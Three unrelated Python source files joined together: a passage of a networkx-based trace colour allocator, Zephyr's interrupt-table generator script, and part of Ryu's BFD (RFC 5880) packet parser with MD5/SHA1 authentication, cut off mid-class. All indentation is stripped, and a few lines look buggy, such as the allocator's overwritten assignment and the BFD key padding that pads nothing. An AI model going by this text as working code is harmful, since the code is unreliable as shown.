return self._color_allocations[tr]
def _get_linkages_from_rules(self, all_traces):
links = chain(*[link_rule(all_traces) for link_rule in self.linkage_rules])
return list(links)
def process(self, plotspec_to_traces_dict):
""" Assign colours to the traces. We aim to minise color clashes, but
still only use one color for a given trace, even if it appears on multiple plots.
1/ We build a graph, in which each node represents trace, and edges represent 'linkage'
2/ We look at the connected components, i.e. the traces that should all have the same color_indices
3/ If we have more groups than colours, then we allocate 'color indices to these groups based
on mimising color collisions the plots.
## TODO: 4/ Actual colour is assigned by the color_assigner.
"""
import networkx
new_colors = [ linkage_rule.preferred_color for linkage_rule in self.linkage_rules if linkage_rule.preferred_color]
new_colors = [c for c in new_colors if not c in self._color_cycle]
colors = new_colors + self._color_cycle
all_traces = set(chain(*plotspec_to_traces_dict.values()))
allocated_trace_colors = {}
color_indices = range(len(colors))
G = networkx.Graph()
# Add a node per trace:
for trace in all_traces:
G.add_node(trace)
# Add the edges:
all_links = self._linkages_explicit + self._get_linkages_from_rules(all_traces)
for link in all_links:
(first, remaining) = (link[0], link[1:])
for r in remaining:
G.add_edge(first, r)
groups = networkx.connected_components(G)
for grp in sorted(groups, key=lambda g: (len(g), id(g[0])), reverse=True) :
#Calculate how many collisions we would have for each allocation:
def index_score(i):
s = _get_collision_of_color_index_for_group(colorIndex=i,
group=grp,
plotspec_to_traces_dict=plotspec_to_traces_dict,
allocated_trace_colors=allocated_trace_colors)
return s
new_index = bi.min(color_indices, key=index_score)
# Allocate to colorIndex:
for g in grp:
allocated_trace_colors[g] = new_index
# We have now assigned a color_index to each group, all that now remains
# Make the allocation from index to colors:
self._color_allocations = {}
for trace in all_traces:
self._color_allocations[trace] = self._color_cycle[allocated_trace_colors[trace]]
# Normal behaviour:
color_index = allocated_trace_colors[trace]
self._color_allocations[trace] = self._color_cycle[color_index % len(self._color_cycle) ]
# Allow overriding:
for l in self.linkage_rules:
if l.match(trace) and l.preferred_color:
self._color_allocations[trace] = l.preferred_color
|
|
#!/usr/bin/env python3
#
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
import argparse
import struct
import sys
import os
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
ISR_FLAG_DIRECT = (1 << 0)
# The below few hardware independent magic numbers represent various
# levels of interrupts in a multi-level interrupt system.
# 0x000000FF - represents the 1st level (i.e. the interrupts
# that directly go to the processor).
# 0x0000FF00 - represents the 2nd level (i.e. the interrupts funnel
# into 1 line which then goes into the 1st level)
# 0x00FF0000 - represents the 3rd level (i.e. the interrupts funnel
# into 1 line which then goes into the 2nd level)
FIRST_LVL_INTERRUPTS = 0x000000FF
SECND_LVL_INTERRUPTS = 0x0000FF00
THIRD_LVL_INTERRUPTS = 0x00FF0000
def debug(text):
if args.debug:
sys.stdout.write(os.path.basename(sys.argv[0]) + ": " + text + "\n")
def error(text):
sys.stderr.write(os.path.basename(sys.argv[0]) + ": " + text + "\n")
raise Exception()
def endian_prefix():
if args.big_endian:
return ">"
else:
return "<"
def read_intlist(intlist_path):
"""read a binary file containing the contents of the kernel's .intList
section. This is an instance of a header created by
include/linker/intlist.ld:
struct {
u32_t num_vectors; <- typically CONFIG_NUM_IRQS
struct _isr_list isrs[]; <- Usually of smaller size than num_vectors
}
Followed by instances of struct _isr_list created by IRQ_CONNECT()
calls:
struct _isr_list {
/** IRQ line number */
s32_t irq;
/** Flags for this IRQ, see ISR_FLAG_* definitions */
s32_t flags;
/** ISR to call */
void *func;
/** Parameter for non-direct IRQs */
void *param;
};
"""
intlist = {}
prefix = endian_prefix()
intlist_header_fmt = prefix + "II"
intlist_entry_fmt = prefix + "iiII"
with open(intlist_path, "rb") as fp:
intdata = fp.read()
header_sz = struct.calcsize(intlist_header_fmt)
header = struct.unpack_from(intlist_header_fmt, intdata, 0)
intdata = intdata[header_sz:]
debug(str(header))
intlist["num_vectors"] = header[0]
intlist["offset"] = header[1]
intlist["interrupts"] = [i for i in
struct.iter_unpack(intlist_entry_fmt, intdata)]
debug("Configured interrupt routing")
debug("handler irq flags param")
debug("--------------------------")
for irq in intlist["interrupts"]:
debug("{0:<10} {1:<3} {2:<3} {3}".format(
hex(irq[2]), irq[0], irq[1], hex(irq[3])))
return intlist
def parse_args():
global args
parser = argparse.ArgumentParser(description = __doc__,
formatter_class = argparse.RawDescriptionHelpFormatter)
parser.add_argument("-e", "--big-endian", action="store_true",
help="Target encodes data in big-endian format (little endian is "
"the default)")
parser.add_argument("-d", "--debug", action="store_true",
help="Print additional debugging information")
parser.add_argument("-o", "--output-source", required=True,
help="Output source file")
parser.add_argument("-k", "--kernel", required=True,
help="Zephyr kernel image")
parser.add_argument("-s", "--sw-isr-table", action="store_true",
help="Generate SW ISR table")
parser.add_argument("-V", "--vector-table", action="store_true",
help="Generate vector table")
parser.add_argument("-i", "--intlist", required=True,
help="Zephyr intlist binary for intList extraction")
args = parser.parse_args()
source_header = """
/* AUTO-GENERATED by gen_isr_tables.py, do not edit! */
#include <toolchain.h>
#include <linker/sections.h>
#include <sw_isr_table.h>
#include <arch/cpu.h>
#if defined(CONFIG_GEN_SW_ISR_TABLE) && defined(CONFIG_GEN_IRQ_VECTOR_TABLE)
#define ISR_WRAPPER ((u32_t)&_isr_wrapper)
#else
#define ISR_WRAPPER NULL
#endif
"""
def write_source_file(fp, vt, swt, intlist):
fp.write(source_header)
nv = intlist["num_vectors"]
if vt:
fp.write("u32_t __irq_vector_table _irq_vector_table[%d] = {\n" % nv)
for i in range(nv):
fp.write("\t{},\n".format(vt[i]))
fp.write("};\n")
if not swt:
return
fp.write("struct _isr_table_entry __sw_isr_table _sw_isr_table[%d] = {\n"
% nv)
for i in range(nv):
param, func = swt[i]
if type(func) is int:
func_as_string = "{0:#x}".format(func)
else:
func_as_string = func
fp.write("\t{{(void *){0:#x}, (void *){1}}},\n".format(param, func_as_string))
fp.write("};\n")
def get_symbols(obj):
for section in obj.iter_sections():
if isinstance(section, SymbolTableSection):
return {sym.name: sym.entry.st_value
for sym in section.iter_symbols()}
error("Could not find symbol table")
def getindex(irq, irq_aggregator_pos):
for indx, val in enumerate(irq_aggregator_pos):
if irq == irq_aggregator_pos[indx]:
return indx
error("The index %d has no match. Recheck interrupt configuration" % indx)
def main():
parse_args()
with open(args.kernel, "rb") as fp:
kernel = ELFFile(fp)
syms = get_symbols(kernel)
if "CONFIG_MULTI_LEVEL_INTERRUPTS" in syms:
if "CONFIG_2ND_LEVEL_INTERRUPTS" in syms:
if "CONFIG_NUM_2ND_LEVEL_AGGREGATORS" in syms:
num_aggregators = syms["CONFIG_NUM_2ND_LEVEL_AGGREGATORS"]
list_2nd_lvl_offsets = []
for i in range(num_aggregators):
offset_str = 'CONFIG_2ND_LVL_INTR_' + str(i).zfill(2) + '_OFFSET'
if offset_str in syms:
list_2nd_lvl_offsets.append(syms[offset_str])
debug(str(list_2nd_lvl_offsets))
if "CONFIG_3RD_LEVEL_INTERRUPTS" in syms:
if "CONFIG_NUM_3RD_LEVEL_AGGREGATORS" in syms:
num_aggregators = syms["CONFIG_NUM_3RD_LEVEL_AGGREGATORS"]
list_3rd_lvl_offsets = []
for i in range(num_aggregators):
offset_str = 'CONFIG_3RD_LVL_INTR_' + str(i).zfill(2) + '_OFFSET'
if offset_str in syms:
list_3rd_lvl_offsets.append(syms[offset_str])
debug(str(list_3rd_lvl_offsets))
intlist = read_intlist(args.intlist)
nvec = intlist["num_vectors"]
offset = intlist["offset"]
prefix = endian_prefix()
spurious_handler = "&_irq_spurious"
sw_irq_handler = "ISR_WRAPPER"
debug('offset is ' + str(offset))
debug('num_vectors is ' + str(nvec))
# Set default entries in both tables
if args.sw_isr_table:
# All vectors just jump to the common sw_irq_handler. If some entries
# are used for direct interrupts, they will be replaced later.
if args.vector_table:
vt = [sw_irq_handler for i in range(nvec)]
else:
vt = None
# Default to spurious interrupt handler. Configured interrupts
# will replace these entries.
swt = [(0, spurious_handler) for i in range(nvec)]
else:
if args.vector_table:
vt = [spurious_handler for i in range(nvec)]
else:
error("one or both of -s or -V needs to be specified on command line")
swt = None
for irq, flags, func, param in intlist["interrupts"]:
if (flags & ISR_FLAG_DIRECT):
if (param != 0):
error("Direct irq %d declared, but has non-NULL parameter"
% irq)
vt[irq - offset] = func
else:
# Regular interrupt
if not swt:
error("Regular Interrupt %d declared with parameter 0x%x "
"but no SW ISR_TABLE in use"
% (irq, param))
if not "CONFIG_MULTI_LEVEL_INTERRUPTS" in syms:
swt[irq - offset] = (param, func)
else:
# Figure out third level interrupt position
debug('IRQ = ' + hex(irq))
irq3 = (irq & THIRD_LVL_INTERRUPTS) >> 16
if irq3:
irq_parent = (irq & SECND_LVL_INTERRUPTS) >> 8
list_index = getindex(irq_parent, list_3rd_lvl_offsets)
irq3_baseoffset = syms["CONFIG_3RD_LVL_ISR_TBL_OFFSET"]
max_irq_per = syms["CONFIG_MAX_IRQ_PER_AGGREGATOR"]
irq3_pos = irq3_baseoffset + max_irq_per*list_index + irq3 - 1
debug('IRQ_Indx = ' + str(irq3))
debug('IRQ_Pos = ' + str(irq3_pos))
swt[irq3_pos - offset] = (param, func)
# Figure out second level interrupt position
if not irq3:
irq2 = (irq & SECND_LVL_INTERRUPTS) >> 8
if irq2:
irq_parent = (irq & FIRST_LVL_INTERRUPTS)
list_index = getindex(irq_parent, list_2nd_lvl_offsets)
irq2_baseoffset = syms["CONFIG_2ND_LVL_ISR_TBL_OFFSET"]
max_irq_per = syms["CONFIG_MAX_IRQ_PER_AGGREGATOR"]
irq2_pos = irq2_baseoffset + max_irq_per*list_index + irq2 - 1
debug('IRQ_Indx = ' + str(irq2))
debug('IRQ_Pos = ' + str(irq2_pos))
swt[irq2_pos - offset] = (param, func)
# Figure out first level interrupt position
if not irq3 and not irq2:
irq1 = (irq & FIRST_LVL_INTERRUPTS)
debug('IRQ_Indx = ' + str(irq1))
debug('IRQ_Pos = ' + str(irq1))
swt[irq1 - offset] = (param, func)
with open(args.output_source, "w") as fp:
write_source_file(fp, vt, swt, intlist)
if __name__ == "__main__":
main()
|
|
# Copyright (C) 2014 Xinguard, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
BFD Control packet parser/serializer
RFC 5880
BFD Control packet format
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Vers | Diag |Sta|P|F|C|A|D|M| Detect Mult | Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| My Discriminator |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Your Discriminator |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Desired Min TX Interval |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Required Min RX Interval |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Required Min Echo RX Interval |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
An optional Authentication Section MAY be present in the following
format of types:
1. Format of Simple Password Authentication Section
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Type | Auth Len | Auth Key ID | Password... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
2. Format of Keyed MD5 and Meticulous Keyed MD5 Authentication Section
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Type | Auth Len | Auth Key ID | Reserved |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Key/Digest... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
3. Format of Keyed SHA1 and Meticulous Keyed SHA1 Authentication Section
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Type | Auth Len | Auth Key ID | Reserved |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Auth Key/Hash... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
"""
import binascii
import hashlib
import random
import six
import struct
from . import packet_base
from ryu.lib import addrconv
from ryu.lib import stringify
BFD_STATE_ADMIN_DOWN = 0
BFD_STATE_DOWN = 1
BFD_STATE_INIT = 2
BFD_STATE_UP = 3
BFD_STATE_NAME = {0: "AdminDown",
1: "Down",
2: "Init",
3: "Up"}
BFD_FLAG_POLL = 1 << 5
BFD_FLAG_FINAL = 1 << 4
BFD_FLAG_CTRL_PLANE_INDEP = 1 << 3
BFD_FLAG_AUTH_PRESENT = 1 << 2
BFD_FLAG_DEMAND = 1 << 1
BFD_FLAG_MULTIPOINT = 1
BFD_DIAG_NO_DIAG = 0
BFD_DIAG_CTRL_DETECT_TIME_EXPIRED = 1
BFD_DIAG_ECHO_FUNC_FAILED = 2
BFD_DIAG_NEIG_SIG_SESS_DOWN = 3
BFD_DIAG_FWD_PLANE_RESET = 4
BFD_DIAG_PATH_DOWN = 5
BFD_DIAG_CONCAT_PATH_DOWN = 6
BFD_DIAG_ADMIN_DOWN = 7
BFD_DIAG_REV_CONCAT_PATH_DOWN = 8
BFD_DIAG_CODE_NAME = {0: "No Diagnostic",
1: "Control Detection Time Expired",
2: "Echo Function Failed",
3: "Neighbor Signaled Session Down",
4: "Forwarding Plane Reset",
5: "Path Down",
6: "Concatenated Path Down",
7: "Administratively Down",
8: "Reverse Concatenated Path Down"}
BFD_AUTH_RESERVED = 0
BFD_AUTH_SIMPLE_PASS = 1
BFD_AUTH_KEYED_MD5 = 2
BFD_AUTH_METICULOUS_KEYED_MD5 = 3
BFD_AUTH_KEYED_SHA1 = 4
BFD_AUTH_METICULOUS_KEYED_SHA1 = 5
BFD_AUTH_TYPE_NAME = {0: "Reserved",
1: "Simple Password",
2: "Keyed MD5",
3: "Meticulous Keyed MD5",
4: "Keyed SHA1",
5: "Meticulous Keyed SHA1"}
class bfd(packet_base.PacketBase):
"""BFD (RFC 5880) Control packet encoder/decoder class.
The serialized packet would looks like the ones described
in the following sections.
* RFC 5880 Generic BFD Control Packet Format
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|L|
============================== ============================================
Attribute Description
============================== ============================================
ver The version number of the protocol.
This class implements protocol version 1.
diag A diagnostic code specifying the local
system's reason for the last change in
session state.
state The current BFD session state as seen by
the transmitting system.
flags Bitmap of the following flags.
| BFD_FLAG_POLL
| BFD_FLAG_FINAL
| BFD_FLAG_CTRL_PLANE_INDEP
| BFD_FLAG_AUTH_PRESENT
| BFD_FLAG_DEMAND
| BFD_FLAG_MULTIPOINT
detect_mult Detection time multiplier.
my_discr My Discriminator.
your_discr Your Discriminator.
desired_min_tx_interval Desired Min TX Interval. (in microseconds)
required_min_rx_interval Required Min RX Interval. (in microseconds)
required_min_echo_rx_interval Required Min Echo RX Interval.
(in microseconds)
auth_cls (Optional) Authentication Section instance.
It's defined only when the Authentication
Present (A) bit is set in flags.
Assign an instance of the following classes:
``SimplePassword``, ``KeyedMD5``,
``MeticulousKeyedMD5``, ``KeyedSHA1``, and
``MeticulousKeyedSHA1``.
length (Optional) Length of the BFD Control packet,
in bytes.
============================== ============================================
"""
_PACK_STR = '!BBBBIIIII'
_PACK_STR_LEN = struct.calcsize(_PACK_STR)
_TYPE = {
'ascii': []
}
_auth_parsers = {}
def __init__(self, ver=1, diag=0, state=0, flags=0, detect_mult=0,
my_discr=0, your_discr=0, desired_min_tx_interval=0,
required_min_rx_interval=0, required_min_echo_rx_interval=0,
auth_cls=None, length=None):
super(bfd, self).__init__()
self.ver = ver
self.diag = diag
self.state = state
self.flags = flags
self.detect_mult = detect_mult
self.my_discr = my_discr
self.your_discr = your_discr
self.desired_min_tx_interval = desired_min_tx_interval
self.required_min_rx_interval = required_min_rx_interval
self.required_min_echo_rx_interval = required_min_echo_rx_interval
self.auth_cls = auth_cls
if isinstance(length, int):
self.length = length
else:
self.length = len(self)
def __len__(self):
if self.flags & BFD_FLAG_AUTH_PRESENT and self.auth_cls is not None:
return self._PACK_STR_LEN + len(self.auth_cls)
else:
return self._PACK_STR_LEN
@classmethod
def parser(cls, buf):
(diag, flags, detect_mult, length, my_discr, your_discr,
desired_min_tx_interval, required_min_rx_interval,
required_min_echo_rx_interval) = \
struct.unpack_from(cls._PACK_STR, buf[:cls._PACK_STR_LEN])
ver = diag >> 5
diag = diag & 0x1f
state = flags >> 6
flags = flags & 0x3f
if flags & BFD_FLAG_AUTH_PRESENT:
auth_type = six.indexbytes(buf, cls._PACK_STR_LEN)
auth_cls = cls._auth_parsers[auth_type].\
parser(buf[cls._PACK_STR_LEN:])[0]
else:
auth_cls = None
msg = cls(ver, diag, state, flags, detect_mult,
my_discr, your_discr, desired_min_tx_interval,
required_min_rx_interval, required_min_echo_rx_interval,
auth_cls)
return msg, None, None
def serialize(self, payload, prev):
if self.flags & BFD_FLAG_AUTH_PRESENT and self.auth_cls is not None:
return self.pack() + \
self.auth_cls.serialize(payload=None, prev=self)
else:
return self.pack()
def pack(self):
"""
Encode a BFD Control packet without authentication section.
"""
diag = (self.ver << 5) + self.diag
flags = (self.state << 6) + self.flags
length = len(self)
return struct.pack(self._PACK_STR, diag, flags, self.detect_mult,
length, self.my_discr, self.your_discr,
self.desired_min_tx_interval,
self.required_min_rx_interval,
self.required_min_echo_rx_interval)
def authenticate(self, *args, **kwargs):
"""Authenticate this packet.
Returns a boolean indicates whether the packet can be authenticated
or not.
Returns ``False`` if the Authentication Present (A) is not set in the
flag of this packet.
Returns ``False`` if the Authentication Section for this packet is not
present.
For the description of the arguemnts of this method, refer to the
authentication method of the Authentication Section classes.
"""
if not self.flags & BFD_FLAG_AUTH_PRESENT or \
not issubclass(self.auth_cls.__class__, BFDAuth):
return False
return self.auth_cls.authenticate(self, *args, **kwargs)
@classmethod
def set_auth_parser(cls, auth_cls):
cls._auth_parsers[auth_cls.auth_type] = auth_cls
@classmethod
def register_auth_type(cls, auth_type):
def _set_type(auth_cls):
auth_cls.set_type(auth_cls, auth_type)
cls.set_auth_parser(auth_cls)
return auth_cls
return _set_type
class BFDAuth(stringify.StringifyMixin):
"""Base class of BFD (RFC 5880) Authentication Section
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
.. tabularcolumns:: |l|L|
=========== ============================================
Attribute Description
=========== ============================================
auth_type The authentication type in use.
auth_len The length, in bytes, of the authentication
section, including the ``auth_type`` and
``auth_len`` fields.
=========== ============================================
"""
_PACK_HDR_STR = '!BB'
_PACK_HDR_STR_LEN = struct.calcsize(_PACK_HDR_STR)
auth_type = None
def __init__(self, auth_len=None):
super(BFDAuth, self).__init__()
if isinstance(auth_len, int):
self.auth_len = auth_len
else:
self.auth_len = len(self)
@staticmethod
def set_type(subcls, auth_type):
assert issubclass(subcls, BFDAuth)
subcls.auth_type = auth_type
@classmethod
def parser_hdr(cls, buf):
"""
Parser for common part of authentication section.
"""
return struct.unpack_from(cls._PACK_HDR_STR,
buf[:cls._PACK_HDR_STR_LEN])
def serialize_hdr(self):
"""
Serialization function for common part of authentication section.
"""
return struct.pack(self._PACK_HDR_STR, self.auth_type, self.auth_len)
@bfd.register_auth_type(BFD_AUTH_SIMPLE_PASS)
class SimplePassword(BFDAuth):
""" BFD (RFC 5880) Simple Password Authentication Section class
An instance has the following attributes.
Most of them are same to the on-wire counterparts but in host byte order.
.. tabularcolumns:: |l|L|
=========== ============================================
Attribute Description
=========== ============================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
password The simple password in use on this session.
The password is a binary string, and MUST be
from 1 to 16 bytes in length.
auth_len The length, in bytes, of the authentication
section, including the ``auth_type`` and
``auth_len`` fields.
=========== ============================================
"""
_PACK_STR = '!B'
_PACK_STR_LEN = struct.calcsize(_PACK_STR)
def __init__(self, auth_key_id, password, auth_len=None):
assert len(password) >= 1 and len(password) <= 16
self.auth_key_id = auth_key_id
self.password = password
super(SimplePassword, self).__init__(auth_len)
def __len__(self):
return self._PACK_HDR_STR_LEN + self._PACK_STR_LEN + len(self.password)
@classmethod
def parser(cls, buf):
(auth_type, auth_len) = cls.parser_hdr(buf)
assert auth_type == cls.auth_type
auth_key_id = six.indexbytes(buf, cls._PACK_HDR_STR_LEN)
password = buf[cls._PACK_HDR_STR_LEN + cls._PACK_STR_LEN:auth_len]
msg = cls(auth_key_id, password, auth_len)
return msg, None, None
def serialize(self, payload, prev):
"""Encode a Simple Password Authentication Section.
``payload`` is the rest of the packet which will immediately follow
this section.
``prev`` is a ``bfd`` instance for the BFD Control header. It's not
necessary for encoding only the Simple Password section.
"""
return self.serialize_hdr() + \
struct.pack(self._PACK_STR, self.auth_key_id) + self.password
def authenticate(self, prev=None, auth_keys=None):
"""Authenticate the password for this packet.
This method can be invoked only when ``self.password`` is defined.
Returns a boolean indicates whether the password can be authenticated
or not.
``prev`` is a ``bfd`` instance for the BFD Control header. It's not
necessary for authenticating the Simple Password.
``auth_keys`` is a dictionary of authentication key chain which
key is an integer of *Auth Key ID* and value is a string of *Password*.
"""
auth_keys = auth_keys if auth_keys else {}
assert isinstance(prev, bfd)
if self.auth_key_id in auth_keys and \
self.password == auth_keys[self.auth_key_id]:
return True
else:
return False
@bfd.register_auth_type(BFD_AUTH_KEYED_MD5)
class KeyedMD5(BFDAuth):
""" BFD (RFC 5880) Keyed MD5 Authentication Section class
An instance has the following attributes.
Most of them are same to the on-wire counterparts but in host byte order.
.. tabularcolumns:: |l|L|
=========== =================================================
Attribute Description
=========== =================================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
seq The sequence number for this packet.
This value is incremented occasionally.
auth_key The shared MD5 key for this packet.
digest (Optional) The 16-byte MD5 digest for the packet.
auth_len (Fixed) The length of the authentication section
is 24 bytes.
=========== =================================================
"""
_PACK_STR = '!BBL16s'
_PACK_STR_LEN = struct.calcsize(_PACK_STR)
def __init__(self, auth_key_id, seq, auth_key=None, digest=None,
auth_len=None):
self.auth_key_id = auth_key_id
self.seq = seq
self.auth_key = auth_key
self.digest = digest
super(KeyedMD5, self).__init__(auth_len)
def __len__(self):
# Defined in RFC5880 Section 4.3.
return 24
@classmethod
def parser(cls, buf):
(auth_type, auth_len) = cls.parser_hdr(buf)
assert auth_type == cls.auth_type
assert auth_len == 24
(auth_key_id, reserved, seq, digest) = \
struct.unpack_from(cls._PACK_STR, buf[cls._PACK_HDR_STR_LEN:])
assert reserved == 0
msg = cls(auth_key_id=auth_key_id, seq=seq, auth_key=None,
digest=digest)
return msg, None, None
def serialize(self, payload, prev):
"""Encode a Keyed MD5 Authentication Section.
This method is used only when encoding an BFD Control packet.
``payload`` is the rest of the packet which will immediately follow
this section.
``prev`` is a ``bfd`` instance for the BFD Control header which this
authentication section belongs to. It's necessary to be assigned
because an MD5 digest must be calculated over the entire BFD Control
packet.
"""
assert self.auth_key is not None and len(self.auth_key) <= 16
assert isinstance(prev, bfd)
bfd_bin = prev.pack()
auth_hdr_bin = self.serialize_hdr()
auth_data_bin = struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, self.auth_key +
(b'\x00' * (len(self.auth_key) - 16)))
h = hashlib.md5()
h.update(bfd_bin + auth_hdr_bin + auth_data_bin)
self.digest = h.digest()
return auth_hdr_bin + struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, self.digest)
def authenticate(self, prev, auth_keys=None):
"""Authenticate the MD5 digest for this packet.
This method can be invoked only when ``self.digest`` is defined.
Returns a boolean indicates whether the digest can be authenticated
by the correspondent Auth Key or not.
``prev`` is a ``bfd`` instance for the BFD Control header which this
authentication section belongs to. It's necessary to be assigned
because an MD5 digest must be calculated over the entire BFD Control
packet.
``auth_keys`` is a dictionary of authentication key chain which
key is an integer of *Auth Key ID* and value is a string of *Auth Key*.
"""
auth_keys = auth_keys if auth_keys else {}
assert isinstance(prev, bfd)
if self.digest is None:
return False
if self.auth_key_id not in auth_keys:
return False
auth_key = auth_keys[self.auth_key_id]
bfd_bin = prev.pack()
auth_hdr_bin = self.serialize_hdr()
auth_data_bin = struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, auth_key +
(b'\x00' * (len(auth_key) - 16)))
h = hashlib.md5()
h.update(bfd_bin + auth_hdr_bin + auth_data_bin)
if self.digest == h.digest():
return True
else:
return False
@bfd.register_auth_type(BFD_AUTH_METICULOUS_KEYED_MD5)
class MeticulousKeyedMD5(KeyedMD5):
""" BFD (RFC 5880) Meticulous Keyed MD5 Authentication Section class
All methods of this class are inherited from ``KeyedMD5``.
An instance has the following attributes.
Most of them are same to the on-wire counterparts but in host byte order.
.. tabularcolumns:: |l|L|
=========== =================================================
Attribute Description
=========== =================================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
seq The sequence number for this packet.
This value is incremented for each
successive packet transmitted for a session.
auth_key The shared MD5 key for this packet.
digest (Optional) The 16-byte MD5 digest for the packet.
auth_len (Fixed) The length of the authentication section
is 24 bytes.
=========== =================================================
"""
pass
@bfd.register_auth_type(BFD_AUTH_KEYED_SHA1)
class KeyedSHA1(BFDAuth):
""" BFD (RFC 5880) Keyed SHA1 Authentication Section class
An instance has the following attributes.
Most of them are same to the on-wire counterparts but in host byte order.
.. tabularcolumns:: |l|L|
=========== ================================================
Attribute Description
=========== ================================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
seq The sequence number for this packet.
This value is incremented occasionally.
auth_key The shared SHA1 key for this packet.
auth_hash (Optional) The 20-byte SHA1 hash for the packet.
auth_len (Fixed) The length of the authentication section
is 28 bytes.
=========== ================================================
"""
_PACK_STR = '!BBL20s'
_PACK_STR_LEN = struct.calcsize(_PACK_STR)
def __init__(self, auth_key_id, seq, auth_key=None, auth_hash=None,
auth_len=None):
self.auth_key_id = auth_key_id
self.seq = seq
self.auth_key = auth_key
self.auth_hash = auth_hash
super(KeyedSHA1, self).__init__(auth_len)
def __len__(self):
# Defined in RFC5880 Section 4.4.
return 28
@classmethod
def parser(cls, buf):
(auth_type, auth_len) = cls.parser_hdr(buf)
assert auth_type == cls.auth_type
assert auth_len == 28
(auth_key_id, reserved, seq, auth_hash) = \
struct.unpack_from(cls._PACK_STR, buf[cls._PACK_HDR_STR_LEN:])
assert reserved == 0
msg = cls(auth_key_id=auth_key_id, seq=seq, auth_key=None,
auth_hash=auth_hash)
return msg, None, None
def serialize(self, payload, prev):
"""Encode a Keyed SHA1 Authentication Section.
This method is used only when encoding an BFD Control packet.
``payload`` is the rest of the packet which will immediately follow
this section.
``prev`` is a ``bfd`` instance for the BFD Control header which this
authentication section belongs to. It's necessary to be assigned
because an SHA1 hash must be calculated over the entire BFD Control
packet.
"""
assert self.auth_key is not None and len(self.auth_key) <= 20
assert isinstance(prev, bfd)
bfd_bin = prev.pack()
auth_hdr_bin = self.serialize_hdr()
auth_data_bin = struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, self.auth_key +
(b'\x00' * (len(self.auth_key) - 20)))
h = hashlib.sha1()
h.update(bfd_bin + auth_hdr_bin + auth_data_bin)
self.auth_hash = h.digest()
return auth_hdr_bin + struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, self.auth_hash)
def authenticate(self, prev, auth_keys=None):
"""Authenticate the SHA1 hash for this packet.
